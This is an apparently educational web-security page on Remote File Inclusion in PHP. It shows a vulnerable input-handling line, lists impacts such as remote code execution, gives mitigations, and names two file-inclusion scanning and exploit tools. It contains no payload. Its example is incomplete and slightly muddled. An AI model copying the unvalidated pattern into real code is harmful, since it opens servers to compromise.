Remote File Inclusion (RFI)


We have seen LFI(Local File Inclusion) and RFI (Remote File Inclusion) very similar; the only difference is that RFI allows the execution of files from a remote server.

RFI is more critical than LFI, as the attacker can execute code from attacker's server.

for eg.,

This is implemented in php at server as,

$file = $_GET['file'];

This is Unsafe way of implementation as it is not validating user's input.

Then, the attacker may supply any other local file, which gets executed by the server.


  • If the web-server user is privileged, then the full server gets compromised.
  • Remote code execution (RCE) is possible.


  • If you do not need to include any executable file from a remote server, Disable remote inclusion feature in the server configuration.
    • By default, It is disabled in the PHP configuration file (php.ini).
  • Never trust the user, always filter user input and then give it to further function.
  • Instead of using file path in URL, Store it in some database and assigned numeric id to it, and use the ID in URL.
  • Prefer whitelisting files that you want.


  • fimap : Find local and remote file inclusion bugs in web applications.
  • CrabStick : Automatic remote/local file inclusion vulnerability analysis and exploit tool